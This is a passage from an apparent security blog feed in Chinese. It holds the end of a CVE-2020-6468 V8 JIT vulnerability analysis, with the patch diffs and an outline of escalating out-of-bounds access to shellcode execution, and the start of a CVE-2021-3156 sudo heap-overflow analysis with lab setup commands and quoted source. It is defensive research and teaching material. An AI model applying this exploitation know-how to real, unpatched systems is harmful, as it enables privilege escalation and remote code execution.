class="number">1.1</span>;</span><br></pre></td></tr></table></figure><p>运行结果如下（注意使用 release 版本的 v8 ）：</p><p><img src="/2021/02/CVE-2020-6468/oob_exp.png" alt="img"></p><p>注意该 exp 中的关键点：函数 f 经过多次 opt 以及 deopt，搭配函数内部中错误的指令调度，导致当传入了一个非 A 非 B 类型的数组后，成功在数组长度位置处写入 -1。</p></li><li><p>当获取到越界读取原语后，我们就可以构建 ArrayBuffer 并覆写其 backing_store 指针，进而构造任意地址读写原语 =&gt; 写入 shellcode =&gt; 执行并获取 shell。这方面内容就不再过多展开了，感兴趣的可以查看之前那个 GoogleCTF2018 (Final) JIT WP，内含后续构造的详细构造。</p></li></ul><h2 id="五、后记">五、后记</h2><ul><li><p>漏洞修复见如下链接 - <a href="https://chromium.googlesource.com/v8/v8.git/+/2eb04d82cc353dd0b58bbffd21ee01d498ad506c%5E%21/#F0">revision1</a> | <a href="https://chromium.googlesource.com/v8/v8.git/+/de2c0a3b2bf9922d72556a277ea2d5b648471fa6%5E%21/#F0">revision2</a>。</p><p>新打的 patch 完成以下两操作：</p><ul><li><p>将 Terminate 的优化操作从 DeadCodeElimination 中移除</p><blockquote><p>因为 Terminate 结点并非实际控制流结点，因此不能转换成 Throw 结点。</p></blockquote></li><li><p>对 Schedule 类成员中 可选的DCHECK 修改成 强制的CHECK。</p><blockquote><p>Schedule 类成员函数对重建控制流起到了很重要的作用。在此处加强 check 将会降低重建异常控制流的可能性。</p></blockquote></li></ul><p>具体 diff 如下：</p><ul><li><p>revision1:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -317,7 +317,10 @@</span></span><br><span class="line">          node-&gt;opcode() == IrOpcode::kTailCall);</span><br><span class="line">   Reduction reduction = PropagateDeadControl(node);</span><br><span class="line">   if (reduction.Changed()) return reduction;</span><br><span class="line"><span class="deletion">-  if (FindDeadInput(node) != nullptr) &#123;</span></span><br><span class="line"><span class="addition">+  // Terminate nodes are not part of actual control flow, so they should never</span></span><br><span class="line"><span class="addition">+  // be replaced with Throw.</span></span><br><span class="line"><span class="addition">+  if (node-&gt;opcode() != IrOpcode::kTerminate &amp;&amp;</span></span><br><span class="line"><span class="addition">+      FindDeadInput(node) != nullptr) &#123;</span></span><br><span class="line">     Node* effect = NodeProperties::GetEffectInput(node, 0);</span><br><span class="line">     Node* control = NodeProperties::GetControlInput(node, 0);</span><br><span class="line">     if (effect-&gt;opcode() != IrOpcode::kUnreachable) &#123;</span><br></pre></td></tr></table></figure></li><li><p>revision2:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -218,7 +218,7 @@</span></span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddGoto(BasicBlock* block, BasicBlock* succ) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kGoto);</span><br><span class="line">   AddSuccessor(block, succ);</span><br><span class="line"> &#125;</span><br><span class="line"><span class="meta">@@ -243,7 +243,7 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::AddCall(BasicBlock* block, Node* call, BasicBlock* success_block,</span><br><span class="line">                        BasicBlock* exception_block) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   DCHECK(IsPotentiallyThrowingCall(call-&gt;opcode()));</span><br><span class="line">   block-&gt;set_control(BasicBlock::kCall);</span><br><span class="line">   AddSuccessor(block, success_block);</span><br><span class="line"><span class="meta">@@ -253,7 +253,7 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::AddBranch(BasicBlock* block, Node* branch, BasicBlock* tblock,</span><br><span class="line">                          BasicBlock* fblock) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   DCHECK_EQ(IrOpcode::kBranch, branch-&gt;opcode());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kBranch);</span><br><span class="line">   AddSuccessor(block, tblock);</span><br><span class="line"><span class="meta">@@ -263,7 +263,7 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::AddSwitch(BasicBlock* block, Node* sw, BasicBlock** succ_blocks,</span><br><span class="line">                          size_t succ_count) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   DCHECK_EQ(IrOpcode::kSwitch, sw-&gt;opcode());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kSwitch);</span><br><span class="line">   for (size_t index = 0; index &lt; succ_count; ++index) &#123;</span><br><span class="line"><span class="meta">@@ -273,28 +273,28 @@</span></span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddTailCall(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kTailCall);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddReturn(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kReturn);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddDeoptimize(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kDeoptimize);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddThrow(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kThrow);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"><span class="meta">@@ -302,8 +302,8 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::InsertBranch(BasicBlock* block, BasicBlock* end, Node* branch,</span><br><span class="line">                             BasicBlock* tblock, BasicBlock* fblock) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line">   end-&gt;set_control(block-&gt;control());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kBranch);</span><br><span class="line">   MoveSuccessors(block, end);</span><br><span class="line"><span class="meta">@@ -317,8 +317,8 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::InsertSwitch(BasicBlock* block, BasicBlock* end, Node* sw,</span><br><span class="line">                             BasicBlock** succ_blocks, size_t succ_count) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line">   end-&gt;set_control(block-&gt;control());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kSwitch);</span><br><span class="line">   MoveSuccessors(block, end);</span><br></pre></td></tr></table></figure></li></ul></li><li><p>一点点总结：</p><ul><li>调试 v8 JIT 相关的代码时，一定要让目标函数多运行几次，以建立起充足的 type feedback，这样就可以在调试上少走很多弯路。</li><li>熟练使用 GDB <code>call</code> / <code>p</code>指令，这样可以方便的通过对应类中内置的 Print 函数，直接在gdb中将 graph / node 打印输出，便于调试。</li></ul></li></ul><blockquote><p>实际上，对于这篇漏洞分析，笔者还是有点不太满意，因为受到技术水平的限制，实际要分析的 TypeConfusion 点并没有非常透彻的分析出来，因此这篇文章主体上还是侧重于介绍 JIT 中的一部分优化机制。</p></blockquote><h2 id="六、参考">六、参考</h2><ul><li><p><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1076708">Issue 1076708: OOB read/write in v8::internal::ElementsAccessorBase&lt;v8::internal::FastHoleyDoubleElementsAccessor</a></p></li><li><p>TurboFan相关</p><ul><li><p><a href="https://docs.google.com/presentation/d/1H1lLsbclvzyOF3IUR05ZUaZcqDxo7_-8f4yJoxdMooU/htmlpresent">An overview of the TurboFan compiler</a></p></li><li><p><a href="https://docs.google.com/presentation/d/1Z9iIHojKDrXvZ27gRX51UxHD-bKf1QcPzSijntpMJBM/edit#slide=id.p">Turbofan IR</a></p></li><li><p><a href="https://docs.google.com/presentation/d/1sOEF4MlF7LeO7uq-uThJSulJlTh--wgLeaVibsbb3tc/edit#slide=id.p">TurboFan JIT Design</a></p></li><li><p><a href="https://stackoverflow.com/questions/57463700/meaning-of-merge-phi-effectphi-and-dead-in-v8-terminology">Meaning of merge, phi, effectphi and dead in v8 terminology - stack overflow</a></p></li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;一、前言&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2020-6468 是 v8 中的一个位于 &lt;code&gt;DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall&lt;/code&gt; 函数的 JIT 漏洞。通过该漏洞攻击者可&lt;strong&gt;触发类型混淆&lt;/strong&gt;并&lt;strong&gt;修改数组的长度&lt;/strong&gt;，这会导致&lt;strong&gt;任意越界读写&lt;/strong&gt;并可进一步达到 &lt;strong&gt;RCE&lt;/strong&gt;。&lt;/p&gt;
&lt;p&gt;具体的说，就是可以在 CheckMaps 结点前向目标对象内部写入 -1，在被认出对象类型前成功修改数组长度。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;测试用的 v8 版本为 &lt;code&gt;8.1.307&lt;/code&gt; 。&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2021-3156分析</title>
    <link href="https://kiprey.github.io/2021/01/CVE-2021-3156/"/>
    <id>https://kiprey.github.io/2021/01/CVE-2021-3156/</id>
    <published>2021-01-29T14:38:27.000Z</published>
    <updated>2025-11-24T03:59:39.781Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">一、前言</h2><ul><li><p><code>sudo</code>是Linux中一个非常重要的管理权限的软件，它允许用户使用 root 权限来运行程序。而CVE-2021-3156是sudo中存在一个堆溢出漏洞。通过该漏洞，任何没有特权的用户均可使用默认的sudo配置获取root权限。</p></li><li><p>该漏洞可以影响从1.8.2~1.8.31p2下的所有旧版本sudo，以及1.9.0~1.9.5p1的所有稳定版sudo。</p><p>Qualys漏洞团队于<code>2021-01-13</code>联系 sudo 团队、<code>2021-01-26</code>正式披露。</p></li><li><p>由于这个漏洞原理<strong>较为简单</strong>，同时又涉及到<strong>提权</strong>这种高危操作，并且其影响广泛（笔者一台虚拟机、一个WSL以及一台阿里云服务器均可被攻击），相当有趣。所以我们接下来就来简单分析一下这个漏洞。</p><span id="more"></span></li></ul><h2 id="二、环境搭建">二、环境搭建</h2><ul><li><p>首先通过以下命令获取 sudo 的源代码：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get <span class="built_in">source</span> <span class="built_in">sudo</span></span><br></pre></td></tr></table></figure><p>由于获取源代码时，apt-get 提示可直接 git clone 该程序的仓库，因此我们就直接 clone 其仓库：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://salsa.debian.org/debian/sudo.git</span><br></pre></td></tr></table></figure></li><li><p>切换分支并编译 sudo，注意不要 install 。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 注意此时的工作目录必须是git仓库的根目录</span></span><br><span class="line">  <span class="comment"># 以笔者为例，此时笔者的git仓库根目录为 /usr/class/myPoc/CVE-2021-3156/sudo</span></span><br><span class="line">  <span class="comment"># 此时笔者所使用的终端处于非root权限</span></span><br><span class="line"><span class="comment"># 切换分支。笔者切换到了最后一个漏洞版本</span></span><br><span class="line">git reset --hard 36955b3ef399efeea25824d32e6cfbaa444e9f07 <span class="comment"># v1.9.5p1</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 编译， 这里设置了sudo查找sudo.conf、sudoers以及sodoers.so的路径。</span></span><br><span class="line"><span class="comment"># 原指令为 ./configure --sysconfdir=&lt;repo&gt;/examples --with-plugindir=&lt;repo&gt;/plugins/sudoers/.libs  &amp;&amp; make</span></span><br><span class="line">./configure --sysconfdir=/usr/class/myPoc/CVE-2021-3156/sudo/examples --with-plugindir=/usr/class/myPoc/CVE-2021-3156/sudo/plugins/sudoers/.libs/  &amp;&amp; make</span><br><span class="line"></span><br><span class="line"><span class="comment"># 需要注意的是，sudo.conf、sodoers.so以及sudoers这三个文件的owner必须是root，否则会执行失败</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root examples/sudo.conf</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root examples/sudoers</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root plugins/sudoers/.libs/sudoers.so</span><br><span class="line"></span><br><span class="line"><span class="comment"># 切换工作路径至sudo的二进制文件路径</span></span><br><span class="line"><span class="built_in">cd</span> src/.libs</span><br><span class="line"></span><br><span class="line"><span class="comment"># 手动建立一个 sudoedit 链接</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">ln</span> -s <span class="built_in">sudo</span> sudoedit</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置环境变量，原指令为：export LD_LIBRARY_PATH=&quot;&lt;repo&gt;/lib/util/.libs&quot;</span></span><br><span class="line"><span class="built_in">export</span> LD_LIBRARY_PATH=/usr/class/myPoc/CVE-2021-3156/sudo/lib/util/.libs</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置sudo权限</span></span><br><span class="line"><span class="comment"># sudo的权限设置比较特殊，按如下操作：</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root ./sudo</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chmod</span> 4755 ./sudo</span><br><span class="line"></span><br><span class="line"><span class="comment"># 在root权限下执行sudo以及sudoedit</span></span><br><span class="line">./sudo</span><br><span class="line">./sudoedit</span><br></pre></td></tr></table></figure><p>环境配置到最后，root权限下已经可以执行编译出的sudo了。但无论有没有设置 LD_LIBRARY_PATH，普通用户仍然执行不了编译出的sudo。普通用户执行编译出的sudo的报错如下：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./sudo: error <span class="keyword">while</span> loading shared libraries: libsudo_util.so.0: cannot open shared object file: No such file or directory</span><br></pre></td></tr></table></figure><p>既然普通用户执行不了sudo，那就先暂时用root权限调试。</p></li></ul><h2 id="三、漏洞细节">三、漏洞细节</h2><h3 id="1-parse-args-添加转义">1. parse_args 添加转义</h3><p>在main函数中，程序会调用<code>parse_args</code>函数以处理传入的参数。其中有一个<strong>处理转义字符</strong>的代码片段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Command line argument parsing.</span></span><br><span class="line"><span class="comment"> * Sets nargc and nargv which corresponds to the argc/argv we&#x27;ll use</span></span><br><span class="line"><span class="comment"> * for the command to be run (if we are running one).</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * For shell mode we need to rewrite argv</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="comment">// 条件：当 mode 设置了 MODE_RUN，并且 flags 设置了 MODE_SHELL</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">ISSET</span>(mode, MODE_RUN) &amp;&amp; <span class="built_in">ISSET</span>(flags, MODE_SHELL))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 开始构造 &quot;shell -c &lt;command&gt;&quot;指令</span></span><br><span class="line">        <span class="type">char</span> **av, *cmnd = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="type">int</span> ac = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">if</span> (argc != <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">/* shell -c &quot;command&quot; */</span></span><br><span class="line">            <span class="type">char</span> *src, *dst;</span><br><span class="line">            <span class="type">size_t</span> cmnd_size = (<span class="type">size_t</span>)(argv[argc - <span class="number">1</span>] - argv[<span class="number">0</span>]) +</span><br><span class="line">                               <span class="built_in">strlen</span>(argv[argc - <span class="number">1</span>]) + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">            cmnd = dst = <span class="built_in">reallocarray</span>(<span class="literal">NULL</span>, cmnd_size, <span class="number">2</span>);</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="comment">// 开始处理传入的参数</span></span><br><span class="line">            <span class="keyword">for</span> (av = argv; *av != <span class="literal">NULL</span>; av++)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">for</span> (src = *av; *src != <span class="string">&#x27;\0&#x27;</span>; src++)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">/* quote potential meta characters */</span></span><br><span class="line">                    <span class="comment">// 将一些字符转义，即如果发现 _-$ 字符，则在新构造出的&lt;command&gt;中加上 `\`</span></span><br><span class="line">                    <span class="keyword">if</span> (!<span class="built_in">isalnum</span>((<span class="type">unsigned</span> <span class="type">char</span>)*src) &amp;&amp; *src != <span class="string">&#x27;_&#x27;</span> &amp;&amp; *src != <span class="string">&#x27;-&#x27;</span> &amp;&amp; *src != <span class="string">&#x27;$&#x27;</span>)</span><br><span class="line">                        *dst++ = <span class="string">&#x27;\\&#x27;</span>;</span><br><span class="line">                    *dst++ = *src;</span><br><span class="line">                &#125;</span><br><span class="line">                *dst++ = <span class="string">&#x27; &#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (cmnd != dst)</span><br><span class="line">                dst--; <span class="comment">/* replace last space with a NUL */</span></span><br><span class="line">            *dst = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">            ac += <span class="number">2</span>; <span class="comment">/* -c cmnd */</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        av = <span class="built_in">reallocarray</span>(<span class="literal">NULL</span>, ac + <span class="number">1</span>, <span class="built_in">sizeof</span>(<span class="type">char</span> *));</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">        av[<span class="number">0</span>] = (<span class="type">char</span> *)user_details.shell; <span class="comment">/* plugin may override shell */</span></span><br><span class="line">        <span class="keyword">if</span> (cmnd != <span class="literal">NULL</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            av[<span class="number">1</span>] = <span class="string">&quot;-c&quot;</span>;</span><br><span class="line">            av[<span class="number">2</span>] = cmnd;</span><br><span class="line">        &#125;</span><br><span class="line">        av[ac] = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">        argv = av;</span><br><span class="line">        argc = ac;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当程序设置了 MODE_RUN 和 MODE_SHELL 标志后，控制流就会进入内部代码，构造 <code>shell -c &lt;command&gt;</code>指令，并在其中处理<code>&lt;command&gt;</code>中的一些转义字符，在这些转义字符前添加反斜杠。</p><p>若执行 sudo 时设置了 <code>-s</code> 或<code>-i</code>参数，则在<code>parse_args</code>函数中将会同时设置 MODE_RUN 和 MODE_SHELL 标志：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">/* XXX - should fill in settings at the end to avoid dupes */</span></span><br><span class="line">    <span class="keyword">for</span> (;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * Some trickiness is required to allow environment variables</span></span><br><span class="line"><span class="comment">         * to be interspersed with command line options.</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">if</span> ((ch = <span class="built_in">getopt_long</span>(argc, argv, short_opts, long_opts, <span class="literal">NULL</span>)) != <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">switch</span> (ch)</span><br><span class="line">            &#123;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;i&#x27;</span>:</span><br><span class="line">                sudo_settings[ARG_LOGIN_SHELL].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">                <span class="comment">// 设置 MODE_LOGIN_SHELL</span></span><br><span class="line">                <span class="built_in">SET</span>(flags, MODE_LOGIN_SHELL);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;s&#x27;</span>:</span><br><span class="line">                